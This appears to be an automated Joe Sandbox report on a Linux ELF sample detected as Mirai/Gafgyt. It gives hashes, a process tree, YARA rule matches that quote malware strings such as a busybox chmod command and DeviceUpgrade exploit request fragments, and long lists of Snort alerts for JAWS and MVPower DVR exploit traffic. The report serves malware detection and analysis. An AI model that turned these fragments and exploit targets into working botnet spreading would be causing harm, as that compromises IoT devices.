Play interactive tour

Edit tour

Linux Analysis Report 9o6Z1wEokT

Overview

General Information

Sample Name:	9o6Z1wEokT
Analysis ID:	512668
MD5:	68cb43368a1a8837125de604f0c2a11e
SHA1:	aebd07f775086490ee2b054a59fa7f9494c8de84
SHA256:	126ddb96a062731ec243a9313504aaba974cbe7b677d39a23fd6750f88fc772e
Tags:	32elfgafgytintelMirai
Infos:
Most interesting Screenshot:

Detection

Gafgyt Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Yara detected Gafgyt

Malicious sample detected (through community Yara rule)

Sample tries to kill many processes (SIGKILL)

Sample is packed with UPX

Uses known network protocols on non-standard ports

Passes username and password via HTTP get

Sample contains only a LOAD segment without any section mappings

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample tries to kill a process (SIGKILL)

Creates hidden files and/or directories

HTTP GET or POST without a user agent

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	512668
Start date:	01.11.2021
Start time:	10:07:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 11s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	9o6Z1wEokT
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.spre.troj.evad.lin@0/0@1/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

9o6Z1wEokT (PID: 5241, Parent: 5121, MD5: 68cb43368a1a8837125de604f0c2a11e) Arguments: /tmp/9o6Z1wEokT

9o6Z1wEokT New Fork (PID: 5242, Parent: 5241)

9o6Z1wEokT New Fork (PID: 5243, Parent: 5242)

9o6Z1wEokT New Fork (PID: 5244, Parent: 5242)

9o6Z1wEokT New Fork (PID: 5245, Parent: 5242)

9o6Z1wEokT New Fork (PID: 5246, Parent: 5242)

9o6Z1wEokT New Fork (PID: 5247, Parent: 5242)

9o6Z1wEokT New Fork (PID: 5248, Parent: 5242)

xfce4-panel New Fork (PID: 5251, Parent: 2063)

wrapper-2.0 (PID: 5251, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"

xfce4-panel New Fork (PID: 5252, Parent: 2063)

wrapper-2.0 (PID: 5252, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"

xfce4-panel New Fork (PID: 5253, Parent: 2063)

wrapper-2.0 (PID: 5253, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"

xfce4-panel New Fork (PID: 5254, Parent: 2063)

wrapper-2.0 (PID: 5254, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"

wrapper-2.0 New Fork (PID: 5275, Parent: 5254)

xfpm-power-backlight-helper (PID: 5275, Parent: 5254, MD5: 3d221ad23f28ca3259f599b1664e2427) Arguments: /usr/sbin/xfpm-power-backlight-helper --get-max-brightness

xfce4-panel New Fork (PID: 5255, Parent: 2063)

wrapper-2.0 (PID: 5255, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"

xfce4-panel New Fork (PID: 5256, Parent: 2063)

wrapper-2.0 (PID: 5256, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"

dbus-daemon New Fork (PID: 5274, Parent: 5273)

xfconfd (PID: 5274, Parent: 5273, MD5: 4c7a0d6d258bb970905b19b84abcd8e9) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd

systemd New Fork (PID: 5285, Parent: 1860)

xfce4-notifyd (PID: 5285, Parent: 1860, MD5: eee956f1b227c1d5031f9c61223255d1) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
9o6Z1wEokT	SUSP_ELF_LNX_UPX_Compressed_File	Detects a suspicious ELF binary with UPX compression	Florian Roth	0x86aa:$s2: $Id: UPX 0x865b:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5243.1.00000000764ea583.000000008517f29e.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x590:$xo1: Ik~mhhe+14 0x608:$xo1: Ik~mhhe+14 0x680:$xo1: Ik~mhhe+14 0x6f8:$xo1: Ik~mhhe+14 0x770:$xo1: Ik~mhhe+14 0xa00:$xo1: Ik~mhhe+14 0xa58:$xo1: Ik~mhhe+14 0xab0:$xo1: Ik~mhhe+14 0xb08:$xo1: Ik~mhhe+14 0xb60:$xo1: Ik~mhhe+14
5241.1.00000000764ea583.000000008517f29e.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x590:$xo1: Ik~mhhe+14 0x608:$xo1: Ik~mhhe+14 0x680:$xo1: Ik~mhhe+14 0x6f8:$xo1: Ik~mhhe+14 0x770:$xo1: Ik~mhhe+14 0xa00:$xo1: Ik~mhhe+14 0xa58:$xo1: Ik~mhhe+14 0xab0:$xo1: Ik~mhhe+14 0xb08:$xo1: Ik~mhhe+14 0xb60:$xo1: Ik~mhhe+14
5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x138d8:$xo1: Ik~mhhe+14 0x13948:$xo1: Ik~mhhe+14 0x139b8:$xo1: Ik~mhhe+14 0x13a28:$xo1: Ik~mhhe+14 0x13a98:$xo1: Ik~mhhe+14 0x13d08:$xo1: Ik~mhhe+14 0x13d5c:$xo1: Ik~mhhe+14 0x13db0:$xo1: Ik~mhhe+14 0x13e04:$xo1: Ik~mhhe+14 0x13e58:$xo1: Ik~mhhe+14
5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x133f5:$x2: /bin/busybox chmod 777 * /tmp/ 0x13120:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 0x12c60:$s3: POST /cdn-cgi/
5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x138d8:$xo1: Ik~mhhe+14 0x13948:$xo1: Ik~mhhe+14 0x139b8:$xo1: Ik~mhhe+14 0x13a28:$xo1: Ik~mhhe+14 0x13a98:$xo1: Ik~mhhe+14 0x13d08:$xo1: Ik~mhhe+14 0x13d5c:$xo1: Ik~mhhe+14 0x13db0:$xo1: Ik~mhhe+14 0x13e04:$xo1: Ik~mhhe+14 0x13e58:$xo1: Ik~mhhe+14
5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_1	Detects ELF Mirai variant	Florian Roth	0x133f5:$x2: /bin/busybox chmod 777 * /tmp/ 0x13120:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 0x12c60:$s3: POST /cdn-cgi/
5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
Process Memory Space: 9o6Z1wEokT PID: 5241	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0xae1:$xo1: Ik~mhhe+14 0xb51:$xo1: Ik~mhhe+14 0xbc0:$xo1: Ik~mhhe+14 0xc30:$xo1: Ik~mhhe+14 0xc9f:$xo1: Ik~mhhe+14 0xd0e:$xo1: Ik~mhhe+14 0xd7c:$xo1: Ik~mhhe+14 0xdeb:$xo1: Ik~mhhe+14 0xe59:$xo1: Ik~mhhe+14 0x11b5:$xo1: Ik~mhhe+14 0x1208:$xo1: Ik~mhhe+14 0x125a:$xo1: Ik~mhhe+14 0x12ad:$xo1: Ik~mhhe+14 0x12ff:$xo1: Ik~mhhe+14 0x1352:$xo1: Ik~mhhe+14 0x13a4:$xo1: Ik~mhhe+14 0x13f8:$xo1: Ik~mhhe+14 0x144b:$xo1: Ik~mhhe+14 0x14b1:$xo1: Ik~mhhe+1*4
Click to see the 6 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 9o6Z1wEokT	Virustotal: Detection: 32%			Perma Link
Source: 9o6Z1wEokT	ReversingLabs: Detection: 35%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53120 -> 138.68.131.225:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53120 -> 138.68.131.225:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34640 -> 104.82.201.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46986 -> 156.213.55.108:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34640 -> 104.82.201.117:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.82.201.117:80 -> 192.168.2.23:34640
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54050 -> 104.115.139.217:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46986 -> 156.213.55.108:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49492 -> 210.99.207.176:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38716 -> 198.73.227.211:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54050 -> 104.115.139.217:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.139.217:80 -> 192.168.2.23:54050
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56750 -> 52.70.231.13:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49492 -> 210.99.207.176:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56750 -> 52.70.231.13:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57520 -> 104.104.60.154:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57520 -> 104.104.60.154:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.104.60.154:80 -> 192.168.2.23:57520
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60060 -> 8.210.248.86:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60530 -> 163.43.106.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60060 -> 8.210.248.86:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60530 -> 163.43.106.234:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42404 -> 197.13.239.56:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42404 -> 197.13.239.56:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45884 -> 185.17.248.122:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45884 -> 185.17.248.122:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53182 -> 23.198.77.7:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53182 -> 23.198.77.7:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.198.77.7:80 -> 192.168.2.23:53182
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55338 -> 192.240.170.144:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35240 -> 34.73.70.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55338 -> 192.240.170.144:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32902 -> 96.7.166.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35240 -> 34.73.70.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32902 -> 96.7.166.199:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 96.7.166.199:80 -> 192.168.2.23:32902
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48200 -> 104.108.128.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54216 -> 88.148.100.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48452 -> 103.114.55.23:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54216 -> 88.148.100.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37910 -> 184.24.49.150:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39786 -> 149.129.92.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57204 -> 75.118.157.75:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48200 -> 104.108.128.83:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.108.128.83:80 -> 192.168.2.23:48200
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54760 -> 142.234.150.237:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33438
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37910 -> 184.24.49.150:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.24.49.150:80 -> 192.168.2.23:37910
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57204 -> 75.118.157.75:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48452 -> 103.114.55.23:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54760 -> 142.234.150.237:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39786 -> 149.129.92.30:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33482
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33518
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33554
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55204 -> 104.156.244.175:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41710 -> 45.86.69.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39310 -> 197.15.65.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55204 -> 104.156.244.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39310 -> 197.15.65.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41710 -> 45.86.69.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36600 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36600 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42620 -> 18.66.249.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34734 -> 104.102.53.44:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42620 -> 18.66.249.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52076 -> 95.216.219.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37190 -> 92.122.201.80:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34734 -> 104.102.53.44:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.102.53.44:80 -> 192.168.2.23:34734
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37190 -> 92.122.201.80:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.201.80:80 -> 192.168.2.23:37190
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41626 -> 45.242.108.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52076 -> 95.216.219.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38766 -> 194.105.116.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54942 -> 50.202.79.65:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50606 -> 155.138.246.9:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37074 -> 209.251.91.133:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50146 -> 108.160.178.221:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41626 -> 45.242.108.103:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.162.70.50:23 -> 192.168.2.23:49088
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38766 -> 194.105.116.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46974 -> 116.92.244.142:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60680 -> 166.130.141.157:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41604 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50606 -> 155.138.246.9:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50146 -> 108.160.178.221:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52148 -> 49.212.233.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60680 -> 166.130.141.157:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46974 -> 116.92.244.142:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 116.92.244.142:80 -> 192.168.2.23:46974
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41634 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41604 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41604
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52148 -> 49.212.233.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41634 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41634
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36702 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49090 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51006 -> 139.30.254.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39674 -> 178.168.67.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49090 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49090
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51006 -> 139.30.254.30:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36702 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49380 -> 152.13.135.50:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46316 -> 85.215.82.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46316 -> 85.215.82.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39674 -> 178.168.67.90:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50128 -> 207.244.239.42:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47890 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60388 -> 138.68.241.177:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50128 -> 207.244.239.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47890 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59924 -> 103.89.23.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37508 -> 121.142.253.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60388 -> 138.68.241.177:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41718 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59924 -> 103.89.23.61:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37508 -> 121.142.253.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41718 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41718
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49142 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49142 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49142
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38546 -> 18.184.42.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49172 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41212 -> 34.107.199.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38546 -> 18.184.42.77:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41212 -> 34.107.199.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49172 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49172
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48230 -> 23.10.81.41:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38142 -> 37.19.206.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39954 -> 23.15.46.102:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48230 -> 23.10.81.41:80
